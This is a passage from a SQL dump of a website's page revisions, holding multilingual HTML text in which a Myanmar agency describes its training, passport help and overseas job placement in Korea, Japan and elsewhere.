&nbsp; &nbsp;6. &nbsp; &nbsp; &nbsp;ホテル関係</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;7. &nbsp; &nbsp; &nbsp; 衣類関係</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;8. &nbsp; &nbsp; &nbsp; 農業関係</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;9. &nbsp; &nbsp; &nbsp; 漁業関係の工場</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 10. &nbsp; &nbsp; &nbsp;介護関係&nbsp;</span><span style=\"font-family:&quot;MS Mincho&quot;;font-size:9.5pt;mso-bidi-font-family:&quot;MS Mincho&quot;;mso-bidi-font-size:10.0pt;\">{Training Visa)</span><o:p></o:p></p><p class=\"MsoNormal\">6.<span lang=\"JA\">ドバイ、マレーシア、シンガポール、タインなどで働きたい学生達のためにも英語など必要な場合に応じて、パ &nbsp; &nbsp;ソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビ &nbsp; &nbsp; &nbsp; ースをしております。</span><o:p></o:p></p><p><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\">7. &nbsp;</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">上記のサービスを</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\">International Recruitment Integrity System(IRIS)</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">が定めた</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\">Ethical Recruitment and Fair Labour Practices</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">に &nbsp; &nbsp; &nbsp;合った基準で管理しております。</span></p>', '', 'full_html'),
('page', 0, 24, 158, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 24, 166, 'en', 0, '<p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, we provide services to facilitate employment opportunities , if necessary , we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p>', '', 'full_html'),
('page', 0, 24, 166, 'ja', 0, '<p class=\"MsoNormal\">1.&nbsp;<span style=\"mso-spacerun:yes;\"> </span><span lang=\"JA\">ニューコメットトレンディグエイジェンシーでは韓国の造船所で</span>E 7-3 Visa<span lang=\"JA\">で働きたいミャンマー全国から民族 &nbsp; &nbsp; &nbsp;問わず、商務部の下でシンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介 &nbsp; &nbsp; &nbsp;をしております。</span><o:p></o:p></p><p class=\"MsoNormal\">2. <span lang=\"JA\">海外に勤める際使えるそれぞれの国の言葉が勉強できる学校も開いております。</span>(<span lang=\"JA\">現在日本語学校、韓国語学校</span>)<o:p></o:p></p><p class=\"MsoNormal\">3 .<span lang=\"JA\">パスポート作成サービス</span><o:p></o:p></p><p class=\"MsoNormal\">4. <span lang=\"JA\">日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp; &nbsp; &nbsp; &nbsp;取り込んでおります。</span><o:p></o:p></p><p class=\"MsoNormal\">5. <span lang=\"JA\">日本語能力試験</span>(JLPT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>JFT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>NAT-TEST, TOP-J)<span lang=\"JA\">の</span>N3,N2<span lang=\"JA\">以上の合格者達にはワークビザである.</span></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;1. &nbsp; &nbsp;通訳、翻訳</span><o:p></o:p></p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 2. &nbsp; &nbsp;IT<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">事業</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;3. &nbsp; &nbsp;エンジニアに関する事業</span><span style=\"mso-spacerun:yes;\">&nbsp; &nbsp;</span><o:p></o:p>(Civil,Mechanical,EP,EC,Auto Card<span lang=\"JA\">など</span>)<o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;4. &nbsp; &nbsp;介護関係</span><o:p></o:p><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; 実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;1. &nbsp; &nbsp; 車修理関係</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;2. &nbsp; &nbsp;工業関係</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;3. &nbsp; &nbsp; 建築業関係</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;4. &nbsp; &nbsp; 食品関係</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;5. &nbsp; &nbsp; &nbsp;レストラン</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;6. &nbsp; &nbsp; &nbsp;ホテル関係</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;7. &nbsp; &nbsp; &nbsp; 衣類関係</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;8. &nbsp; &nbsp; &nbsp; 農業関係</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;9. &nbsp; &nbsp; &nbsp; 漁業関係の工場</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 10. &nbsp; &nbsp; &nbsp;介護関係&nbsp;</span><span style=\"font-family:&quot;MS Mincho&quot;;font-size:9.5pt;mso-bidi-font-family:&quot;MS Mincho&quot;;mso-bidi-font-size:10.0pt;\">{Training Visa)</span><o:p></o:p></p><p class=\"MsoNormal\">6.<span lang=\"JA\">ドバイ、マレーシア、シンガポール、タインなどで働きたい学生達のためにも英語など必要な場合に応じて、パ &nbsp; &nbsp;ソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビ &nbsp; &nbsp; &nbsp; ースをしております。</span><o:p></o:p></p><p><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\">7. &nbsp;</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">上記のサービスを</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\">International Recruitment Integrity System(IRIS)</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">が定めた</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\">Ethical Recruitment and Fair Labour Practices</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">に &nbsp; &nbsp; &nbsp;合った基準で管理しております。</span></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 24, 166, 'ko', 0, '<ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 한국 조선소에서</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> E-7-3 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비자</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">용접공</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">방문에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(PJ)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">분을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 외국에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일할 때 직장에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어려움을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">겪지</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">않도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직장에 사용하는 기본</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">한국어</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본어</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영어 수업들을 교육 시킴</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 해외</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">방문에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(PJ)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">분을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 일본으로 연수비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">도쿠테이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기노 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(Tokutei Ginou) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비자로 취업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" 